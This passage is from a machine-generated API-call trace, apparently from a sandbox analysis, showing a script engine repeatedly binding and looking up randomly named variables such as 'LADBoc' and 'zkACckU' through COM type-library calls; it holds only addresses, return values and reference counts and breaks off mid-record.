MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2626, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LADBoc") returned 7 [0070.005] ITypeComp:RemoteBind (in: This=0x665bd30, szName="LADBoc", lHashVal=0x10a87e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LADBoc") returned 0x10a87e [0070.005] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="LADBoc" | out: _Dst="LADBoc") returned 0x0 [0070.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="LADBoc") returned 7 [0070.005] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.005] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="LADBoc", lHashVal=0x10a87e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.005] IUnknown:Release (This=0x665ba50) returned 0xf [0070.005] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.005] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="LADBoc", lHashVal=0x10a87e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.005] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.005] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.005] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="LADBoc", lHashVal=0x10a87e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.005] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.005] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.005] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="LADBoc", lHashVal=0x10a87e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.005] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2626, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="LADBoc") returned 7 [0070.005] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="LADBoc", lHashVal=0x10a87e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.006] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0070.006] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb2626 | out: _Dst=0x68767a0) returned 0x0 [0070.006] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_LADBoc") returned 0x1022e8 [0070.006] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_LADBoc" | out: _Dst="_B_var_LADBoc") returned 0x0 [0070.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_LADBoc") returned 14 [0070.006] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.006] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_LADBoc", lHashVal=0x1022e8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.006] IUnknown:Release (This=0x665ba50) returned 0xf [0070.006] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.006] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_LADBoc", lHashVal=0x1022e8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.006] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.006] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.006] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_LADBoc", lHashVal=0x1022e8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.006] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.006] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.006] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_LADBoc", lHashVal=0x1022e8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.006] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.006] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.006] IUnknown:Release (This=0x665ba50) returned 0xf [0070.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1b4e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_LADBoc") returned 14 [0070.006] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_LADBoc", lHashVal=0x1022e8, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x6f004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x6f004200000000, pDummy=0x0) returned 0x0 [0070.006] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2626 | out: _Dst=0x144ec0) returned 0x0 [0070.006] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tUBAoD", lHashVal=0x10336b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb269e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tUBAoD") returned 7 [0070.007] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tUBAoD", lHashVal=0x10336b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb269e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tUBAoD") returned 7 [0070.007] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tUBAoD", lHashVal=0x10336b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tUBAoD") returned 0x10336b [0070.007] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tUBAoD" | out: _Dst="tUBAoD") returned 0x0 [0070.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tUBAoD") returned 7 [0070.007] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.007] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tUBAoD", lHashVal=0x10336b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.007] IUnknown:Release (This=0x665ba50) returned 0xf [0070.007] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.007] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tUBAoD", lHashVal=0x10336b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.007] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.007] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.007] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tUBAoD", lHashVal=0x10336b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.007] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.007] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.007] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tUBAoD", lHashVal=0x10336b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.007] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb269e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tUBAoD") returned 7 [0070.007] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tUBAoD", lHashVal=0x10336b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.007] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0070.007] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb269e | out: _Dst=0x68767a0) returned 0x0 [0070.007] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tUBAoD") returned 0x10ae14 [0070.007] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tUBAoD" | out: _Dst="_B_var_tUBAoD") returned 0x0 [0070.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tUBAoD") returned 14 [0070.008] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.008] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tUBAoD", lHashVal=0x10ae14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.008] IUnknown:Release (This=0x665ba50) returned 0xf [0070.008] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.008] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tUBAoD", lHashVal=0x10ae14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.008] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.008] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.008] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tUBAoD", lHashVal=0x10ae14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.008] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.008] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.008] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tUBAoD", lHashVal=0x10ae14, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.008] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.008] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.008] IUnknown:Release (This=0x665ba50) returned 0xf [0070.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1b7e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tUBAoD") returned 14 [0070.008] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tUBAoD", lHashVal=0x10ae14, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0) returned 0x0 [0070.008] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb269e | out: _Dst=0x144ec0) returned 0x0 [0070.008] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zkACckU", lHashVal=0x1020c3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb26c6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zkACckU") returned 8 [0070.008] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zkACckU", lHashVal=0x1020c3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb26c6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zkACckU") returned 8 [0070.008] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zkACckU", lHashVal=0x1020c3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zkACckU") returned 0x1020c3 [0070.009] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="zkACckU" | out: _Dst="zkACckU") returned 0x0 [0070.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="zkACckU") returned 8 [0070.009] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.009] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zkACckU", lHashVal=0x1020c3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.009] IUnknown:Release (This=0x665ba50) returned 0xf [0070.009] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.009] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zkACckU", lHashVal=0x1020c3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.009] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.009] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.009] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zkACckU", lHashVal=0x1020c3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.009] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.009] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.009] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zkACckU", lHashVal=0x1020c3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.009] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb26c6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zkACckU") returned 8 [0070.009] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zkACckU", lHashVal=0x1020c3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.009] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.009] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb26c6 | out: _Dst=0x68767a0) returned 0x0 [0070.009] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zkACckU") returned 0x1014c6 [0070.009] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_zkACckU" | out: _Dst="_B_var_zkACckU") returned 0x0 [0070.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_zkACckU") returned 15 [0070.009] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.009] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zkACckU", lHashVal=0x1014c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.009] IUnknown:Release (This=0x665ba50) returned 0xf [0070.009] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.010] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zkACckU", lHashVal=0x1014c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.010] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.010] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.010] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zkACckU", lHashVal=0x1014c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.010] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.010] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.010] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zkACckU", lHashVal=0x1014c6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.010] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.010] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.010] IUnknown:Release (This=0x665ba50) returned 0xf [0070.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1bae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_zkACckU") returned 15 [0070.010] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zkACckU", lHashVal=0x1014c6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x63004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x63004300000000, pDummy=0x0) returned 0x0 [0070.010] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb26c6 | out: _Dst=0x144ec0) returned 0x0 [0070.010] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aA_ABxcQ", lHashVal=0x106e5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb26ee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aA_ABxcQ") returned 9 [0070.010] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aA_ABxcQ", lHashVal=0x106e5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb26ee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aA_ABxcQ") returned 9 [0070.010] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aA_ABxcQ", lHashVal=0x106e5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.010] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aA_ABxcQ") returned 0x106e5f [0070.010] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="aA_ABxcQ" | out: _Dst="aA_ABxcQ") returned 0x0 [0070.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="aA_ABxcQ") returned 9 [0070.011] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.011] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aA_ABxcQ", lHashVal=0x106e5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.011] IUnknown:Release (This=0x665ba50) returned 0xf [0070.011] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.011] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aA_ABxcQ", lHashVal=0x106e5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.011] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.011] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.011] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aA_ABxcQ", lHashVal=0x106e5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.011] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.011] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.011] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aA_ABxcQ", lHashVal=0x106e5f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.011] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb26ee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aA_ABxcQ") returned 9 [0070.011] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aA_ABxcQ", lHashVal=0x106e5f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.011] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0070.011] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3cb26ee | out: _Dst=0x68767a0) returned 0x0 [0070.011] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aA_ABxcQ") returned 0x103667 [0070.011] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_aA_ABxcQ" | out: _Dst="_B_var_aA_ABxcQ") returned 0x0 [0070.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_aA_ABxcQ") returned 16 [0070.011] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.011] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aA_ABxcQ", lHashVal=0x103667, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.011] IUnknown:Release (This=0x665ba50) returned 0xf [0070.011] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.011] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aA_ABxcQ", lHashVal=0x103667, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.011] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.011] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.011] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aA_ABxcQ", lHashVal=0x103667, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.012] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.012] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.012] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aA_ABxcQ", lHashVal=0x103667, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.012] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.012] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.012] IUnknown:Release (This=0x665ba50) returned 0xf [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1bde, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_aA_ABxcQ") returned 16 [0070.012] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aA_ABxcQ", lHashVal=0x103667, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, 